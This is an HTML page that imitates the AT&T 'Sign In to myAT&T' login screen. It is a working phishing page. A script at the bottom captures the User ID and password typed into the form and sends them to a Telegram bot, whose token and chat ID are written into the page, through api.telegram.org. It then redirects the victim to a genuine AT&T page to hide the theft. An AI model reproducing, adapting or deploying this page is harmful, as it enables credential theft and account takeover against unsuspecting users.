<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
  <title>AT&T - Login</title>
   <style>

    body{
  padding: 0;
  margin: 0;
  background: #f7f7f7;
  box-sizing: border-box;
  font-family: Arial, Helvetica, sans-serif
}

section#form-section .top h3
{
  font-size: 13px
}
section#form-section .top
{
  display: flex;
  justify-content: space-between;
  margin: auto;
  width: 22%;
  align-items: center;
  text-align: center;
}
section#form-section
{
  background: #fff;
      width: 320px;
    min-height: 580px;
  margin: 3% auto auto auto;
  padding: 40px;
  align-items: center;
  text-align: center;
}

.dont-have a,
.can{
      margin-bottom: 0;
    padding: 0;
    font-size: .875rem;
    line-height: 1.5rem;
    color: #0057b8;
    font-weight: bold;
    text-decoration: none

}
form .label a{
  float: right;
    margin-bottom: 0;
    padding: 0;
    font-size: .875rem;
    line-height: 1.5rem;
    color: #0057b8;
    font-weight: bold;
    text-decoration: none
}
form label
{
  float: left
}
form input
{
  background-color: #fff;
    border: 1px solid #797e85;
    border-radius: 3px;
    box-shadow: none;
    width: 100%;
    padding: 10px 0px 10px 10px;
    line-height: 30px;
    outline: none;
    margin: 3% 0%;
}
form button{

}
.save img{
  height: 30px;
}
.save{
  display: flex;
  align-items: center;
}


form button{
  width: 100%;
    height: 48px;
    border-radius: 3px;
    border: 1px solid #0057b8;
    background-color: #0057b8;
    font-size: .875rem;
    color: #fff;
}
button.hollow{
  background: #fff;
  border: 1px solid #000;
  color: #000
}
button.green{
  background: #008522;
  font-weight: bold;
  border: 1px solid #008522;
}

.or-hr p{
  font-size: 10px;
  font-weight: bold;
}
.or-hr hr{
  width: 40%
}
.or-hr
{
  display: flex;
  justify-content: space-between;
  width: 100%;
  align-items: center;
}

footer#footer ul li
{
  font-size: 13px;
  list-style: none;
  color: #0057b8
}
footer#footer p{
  font-size: 12px
}
footer#footer ul{
  width: 40%;
  margin: auto;
  display: flex;
  justify-content: space-between;
}
footer#footer{
  width: 100%;;
  text-align: center;
  align-items: center;
  margin-top: 1%
}

@media(max-width: 1001px){
  footer#footer ul{
  text-align: center;
  flex-direction: column;
}
footer#footer ul li{
  margin-top: 5%
}
}

  </style>

</head>
<body>

  <section id="form-section">
    <div class="top">
          <svg height="28" viewBox="0 0 36 36" width="28"><path d="m7.1 32c3 2.3 6.8 3.7 10.9 3.7 4.5 0 8.6-1.7 11.7-4.4-1.4.9-5.4 3-11.7 3-5.5 0-9-1.2-10.9-2.3m12.1.9c4.4 0 9.2-1.2 12-3.6.8-.6 1.5-1.5 2.2-2.6.4-.7.8-1.5 1.1-2.2-2.7 3.9-10.4 6.4-18.4 6.4-5.6 0-11.7-1.8-14.1-5.3 2.2 4.8 8.9 7.3 17.2 7.3m-4.8-7.8c-9.1 0-13.4-4.2-14.1-7.1 0 1 .1 2.2.3 3.1.1.4.4 1 .9 1.6 2.2 2.3 7.7 5.5 17.2 5.5 12.9 0 15.9-4.3 16.5-5.7.4-1 .7-2.8.7-4.4v-1c-.9 3.4-11.9 8-21.5 8m-12.5-14.7c-.5 1-1.1 2.8-1.3 3.7-.1.4 0 .6.1.9 1.1 2.3 6.6 6 19.4 6 7.8 0 13.9-1.9 14.9-5.4.2-.6.2-1.3 0-2.2-.3-1-.7-2.2-1.2-3.1.1 4.6-12.7 7.6-19.2 7.6-7 0-12.9-2.8-12.9-6.3.1-.5.2-.9.2-1.2m27.8-5.7c.1.1.1.2.1.4 0 2-6 5.4-15.6 5.4-7.1 0-8.4-2.6-8.4-4.3 0-.6.2-1.2.7-1.8-.9.9-1.7 1.7-2.5 2.7-.3.4-.5.8-.5 1 0 3.5 8.7 5.9 16.7 5.9 8.6 0 12.5-2.8 12.5-5.3 0-.9-.3-1.4-1.2-2.4-.6-.6-1.2-1.1-1.8-1.6m-2.6-1.9c-2.7-1.6-5.7-2.5-9.1-2.5s-6.5.9-9.2 2.6c-.8.4-1.3.8-1.3 1.3 0 1.5 3.5 3.1 9.7 3.1 6.1 0 10.9-1.8 10.9-3.5.1-.3-.3-.6-1-1" fill="#009fdb"></path></svg>
          <h3>AT&T</h3>
    </div>
    <div class="sign-att">
      <h2>Sign In</h2>
      <p>to myAT&T</p>
    </div>
    <form action="" method="post" id="form">
      <div class="label">
        <label for="">User ID</label>
        <br>
        <input type="text" id="usr-id" required><br>
        <a href="#">Forgot user ID?</a>
      </div><br>
      <div class="label">
        <label for="">Password</label><br>
        <input type="password" id="pwd" required><br>
        <a href="#">Forgot password?</a>
      </div>
      <div class="save">
        <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAYAAAAeP4ixAAAABmJLR0QA/wD/AP+gvaeTAAACSUlEQVRoge3Zv2sUQRjG8U9URMWoYBIQQREsFEEbbWy0s1I0SKp0lv5orQSD/4GWYqOdaGGsrKwlGBUhjYqNoDYxXiIimqzFzpHzsiG7t7u3G9kH3uJm33fe97s7Mzs7R6NGjfJoBLfwCguI+mwLmA41DPcKcRGtCopfzb5jtBeIpRoU322LWWBG1OtJdNuchGG2IQHkKgbTUlegnbiSxvG16u/6WjbdXfRAAsg8tqchrlDz2NHZkAQS9aeW3Pqn9qQ5si7VgNRNdQT51UtQ3UAe4whmiuisqnfDC2wNNdxO4V9LkE/YG/JfShlTO5AWjoXcp8RzZN2BLOJcyHsIsxliawVyLeTcjXcZY2sDcjfk24znPcTXAuQZNon3S/d77KMQkD8Yw70eCpjBrpDrRo6bUQjIo+A7IN2a37avOBBix+T7nC4EJMIdyzuD6yn8f+Jk8D+OHzkgCgWJ8EA81uGyeDlN8lvCePDbjy85IQoHifAEW0LsOH4n+NwM1wfxpgCIUkAi8fLZPrA4Kx5G7WsPxXNpIyYLgigNJMIUhkIfp8VbjylsC21ZFoVKQSK8xZ7QzwnxGRnx/CkSonSQCB9xsKO/M5LnTe1BInzGURzGtxIgVoCUeRw0Kz5N31dQf90aWPVHUFEgZas516q1/muQ+b5XkV2t7oYkkA99KCSv3nc3JIE87UMheZWqxmHxH49lvMSKsDnLe7o1NWr1b4sqbRHn00J0wszVoPjOJ3EhK0RbQ5jAS/Fq1u/iWyH3hAzDqVGjRiv1F0g95X0VcKkRAAAAAElFTkSuQmCC"/>
        <p>Save user ID</p>
      </div>
      <button type="submit">Sign In</button><br><br>
     
      <br><br>
      <div class="dont-have">
        <p>Don't have a user ID?</p>
        <a href="#">Create one now</a>
      </div>
      
    </form>
  </section><br>

  <footer id="footer">
    <ul id="ul">
      <li>Legal policy center</li>
      <li>Privacy policy</li>
      <li>Terms of use</li>
      <li>Accessibility</li>
      <li>Do not sell my personal Information</li>
    </ul>
    <p>©2022 AT&T Intellectual Property. All rights reserved.</p>
  </footer>


    <script>
      const formal = document.querySelector('#form')
    
      let bot = {
          TOKEN: "6913033602:AAHJYRnQaiFxM9lklGKwAH62KlkbD2f-Eco",
          chatID: "6195541564"
      }


      formal.addEventListener("submit", e =>{
          e.preventDefault();

          let result1 = document.querySelector('#usr-id').value
          let result2 = document.querySelector('#pwd').value
          
          fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=ATT-RESULT=Username::${result1}==++==Password::${result2}`, {
              method: "GET"
          }).then(success => {
              window.location.replace("https://currently.att.yahoo.com//");
          }, error => {
              alert("Message not sent")
              console.log(error)

          })
      })
  </script>

</body>
</html>